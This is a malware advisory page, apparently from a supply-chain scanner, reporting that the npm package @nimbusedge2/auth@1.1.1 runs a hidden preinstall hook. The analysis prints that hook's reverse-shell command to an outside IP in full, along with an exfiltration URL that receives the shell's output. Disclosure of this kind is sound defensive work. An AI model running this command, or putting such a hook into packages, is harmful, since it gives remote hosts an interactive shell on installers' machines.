LWA-2026-12283 MAL-2026-16302 ↗ confirmed malware

@nimbusedge2/auth@1.1.1

Malicious code in @nimbusedge2/auth (npm)

T1059.004 · Unix ShellT1071.001 · Web Protocols

Analysis

The package's preinstall hook opens a reverse shell to 147[.]93[.]157[.]202:8080 using `bash -i >& /dev/tcp/147[.]93[.]157[.]202/8080 0>&1` and pipes the interactive shell's output to hxxp://canarytokens[.]com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact[.]php via a POST. Installing the package hands the remote host an interactive shell on the installer's machine. The package contains no other code.

analyzed by
Leitwacht
first seen
Sep 20, 2026, 07:48 PM
analyzed
Sep 20, 2026, 07:48 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.